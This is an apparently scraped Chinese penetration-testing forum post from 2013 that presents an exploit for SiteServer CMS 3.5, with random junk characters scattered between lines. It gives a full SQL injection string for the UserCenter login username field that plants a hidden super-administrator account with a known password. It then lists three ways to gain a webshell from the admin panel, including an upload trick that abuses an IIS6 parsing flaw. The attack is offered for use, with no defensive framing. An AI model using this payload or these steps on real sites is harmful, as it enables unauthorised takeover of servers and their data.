中国网络渗透测试联盟
标题:
SiteServer CMS UserCenter/login.aspx页面用户名处sql注射
[打印本页]
作者:
admin
时间:
2013-2-16 21:40
标题:
SiteServer CMS UserCenter/login.aspx页面用户名处sql注射
经测试秒杀最新的3.5版
! G( U0 `1 Y3 @5 X, r7 S1 u
stieserver官网:
www.siteserver.cn
; v8 `2 U5 e& ?' t, v! X0 B
EXP:
1 N* F' B1 @) @5 B0 l
直接访问UserCenter/login.aspx
6 Q+ {8 |& G B, ~
用户名处输入:
- {) j, \7 B3 r' Z, ]
! L* S7 f# n: _! a9 n" a
123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
6 f. q9 R, Q# f" W* `
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
: C) d( f/ m( }7 A
之后再访问后台SiteServer/login.aspx用插入的用户登陆
+ Y! E5 S4 a" J0 {. [
后台拿webshell的三种方法:
* E5 H/ h; L8 L
一、
& u* l N- U8 s. F6 s
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
1 v* ]! g) U- v- x6 n# e
二、
( A+ N+ e$ t$ M4 l2 k" E# N
成员权限-》添加用户-》用户名为:1.asp
" m' a6 ]- h2 l; ]) r8 c) e
http://127.0.0.1/usercenter/
/ M( |& v' H& ?$ ]. ^6 m
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
: u3 D, ]* o9 t; D+ ?
(ps:后台添加用户时不会验证是否含有非法字符)
4 X# v! | P; v- S9 t8 H6 x
三、
$ r# i# W' j! n6 b" S( ~% R
系统工具-》实用工具-》机器参数查看
e% \& P6 f1 A8 k& ~: d, J
可以看到数据库类型、名称,WEB路径
: n% Z5 C6 [$ x: g+ f
系统工具-》数据库工具-》SQL语句查询
% ]0 }3 n+ o( p% }# X! B: z6 s
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2